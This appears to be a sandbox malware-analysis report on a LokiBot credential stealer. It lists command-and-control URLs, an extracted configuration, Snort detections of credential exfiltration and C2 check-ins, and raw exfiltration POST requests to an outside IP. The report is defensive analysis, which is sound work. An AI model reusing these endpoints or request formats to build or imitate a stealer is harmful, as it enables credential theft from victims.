Source: http://kbfvzoboss.bid/alien/fre.php |
URL Reputation: Label: malware |
Source: http://alphastand.top/alien/fre.php |
URL Reputation: Label: malware |
Source: http://alphastand.win/alien/fre.php |
URL Reputation: Label: malware |
Source: http://alphastand.trade/alien/fre.php |
URL Reputation: Label: malware |
Source: 1.2.XZoxEqlRUw.exe.400000.0.unpack |
Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "\u0097\u008b\u008b\u008f\u00c5\u00d0\u00d0\u00cc\u00ce\u00d1\u00cd\u00cd\u00cf\u00d1\u00ce\u00d1\u00ce\u00c6\u00cb\u00d0\u0081\u0085\u009e\u009b\u0092\u0096\u0091\u00d0\u008f\u008b\u008d\u00ca\u00d0\u0092\u0090\u0091\u0090\u00d1\u008f\u0097\u008f"]} |
Source: XZoxEqlRUw.exe |
ReversingLabs: Detection: 95% |
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe |
Unpacked PE file: 1.2.XZoxEqlRUw.exe.400000.0.unpack |
Source: XZoxEqlRUw.exe |
Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE |
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe |
Code function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW, |
1_2_00403D74 |
Source: Traffic |
Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49730 -> 31.220.1.194:80 |
Source: Traffic |
Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49730 -> 31.220.1.194:80 |
Source: Traffic |
Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49730 -> 31.220.1.194:80 |
Source: Traffic |
Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49730 -> 31.220.1.194:80 |
Source: Traffic |
Snort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49731 -> 31.220.1.194:80 |
Source: Traffic |
Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49731 -> 31.220.1.194:80 |
Source: Traffic |
Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49731 -> 31.220.1.194:80 |
Source: Traffic |
Snort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49731 -> 31.220.1.194:80 |
Source: Traffic |
Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49732 -> 31.220.1.194:80 |
Source: Traffic |
Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49732 -> 31.220.1.194:80 |
Source: Traffic |
Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49732 -> 31.220.1.194:80 |
Source: Traffic |
Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49732 -> 31.220.1.194:80 |
Source: Traffic |
Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49733 -> 31.220.1.194:80 |
Source: Traffic |
Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49733 -> 31.220.1.194:80 |
Source: Traffic |
Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49733 -> 31.220.1.194:80 |
Source: Traffic |
Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49733 -> 31.220.1.194:80 |
Source: Malware configuration extractor |
URLs: http://kbfvzoboss.bid/alien/fre.php |
Source: Malware configuration extractor |
URLs: http://alphastand.trade/alien/fre.php |
Source: Malware configuration extractor |
URLs: http://alphastand.win/alien/fre.php |
Source: Malware configuration extractor |
URLs: http://alphastand.top/alien/fre.php |
Source: Malware configuration extractor |
URLs: |
Source: Joe Sandbox View |
ASN Name: AMARUTU-TECHNOLOGYNL AMARUTU-TECHNOLOGYNL |
Source: global traffic |
HTTP traffic detected: POST /~zadmin/ptr5/mono.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 31.220.1.194Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0B63912Content-Length: 176Connection: close |
Source: global traffic |
HTTP traffic detected: POST /~zadmin/ptr5/mono.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 31.220.1.194Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0B63912Content-Length: 176Connection: close |
Source: global traffic |
HTTP traffic detected: POST /~zadmin/ptr5/mono.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 31.220.1.194Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0B63912Content-Length: 149Connection: close |
Source: global traffic |
HTTP traffic detected: POST /~zadmin/ptr5/mono.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 31.220.1.194Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0B63912Content-Length: 149Connection: close |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.220.1.194 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.220.1.194 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.220.1.194 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.220.1.194 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.220.1.194 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.220.1.194 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.220.1.194 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.220.1.194 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.220.1.194 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.220.1.194 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.220.1.194 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.220.1.194 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.220.1.194 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.220.1.194 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.220.1.194 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.220.1.194 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.220.1.194 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.220.1.194 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.220.1.194 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.220.1.194 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.220.1.194 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.220.1.194 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.220.1.194 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.220.1.194 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.220.1.194 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.220.1.194 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.220.1.194 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.220.1.194 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.220.1.194 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.220.1.194 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.220.1.194 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.220.1.194 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.220.1.194 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.220.1.194 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.220.1.194 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.220.1.194 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.220.1.194 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.220.1.194 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.220.1.194 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.220.1.194 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.220.1.194 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.220.1.194 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.220.1.194 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.220.1.194 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.220.1.194 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.220.1.194 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.220.1.194 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.220.1.194 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.220.1.194 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 31.220.1.194 |
Source: C:\Users\user\Desktop\XZoxEqlRUw.exe |
Code function: 1_2_00404ED4 recv, |
1_2_00404ED4 |
Source: unknown |
HTTP traffic detected: POST /~zadmin/ptr5/mono.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 31.220.1.194Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: E0B63912Content-Length: 176Connection: close |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 28 Mar 2024 19:56:52 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.yaworld.net/wp-json/>; rel="https://api.w.org/"Connection: closeContent-Type: text/html; charset=UTF-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6b 6f 2d 4b 52 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 3c 21 2d 2d 20 4d 65 74 61 20 73 6f 63 69 61 6c 20 6e 65 74 77 6f 72 6b 73 20 2d 2d 3e 0a 09 09 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 41 6e 61 6c 79 74 69 63 73 20 2d 2d 3e 0a 09 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 74 61 67 20 28 67 74 61 67 2e 6a 73 29 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 47 2d 35 46 31 48 42 4b 51 30 58 45 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 0a 20 20 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 0a 20 20 67 74 61 67 28 27 6a 73 27 2c 20 6e 65 77 20 44 61 74 65 28 29 29 3b 0a 0a 20 20 67 74 61 67 28 27 63 6f 6e 66 69 67 27 2c 20 27 47 2d 35 46 31 48 42 4b 51 30 58 45 27 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 21 2d 2d 20 4d 65 74 61 20 56 65 72 69 66 69 63 61 74 69 6f 6e 20 2d 2d 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 67 6f 6f 67 6c 65 2d 73 69 74 65 2d 76 65 72 69 66 69 63 61 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 47 72 37 51 47 36 6b 34 57 42 48 67 33 5f 46 64 45 72 64 42 53 71 76 42 79 7a 5f 4c 57 44 37 6c 54 39 47 76 48 74 66 79 39 49 77 22 20 2f 3e 09 0a 3c 73 74 79 6c 65 3e |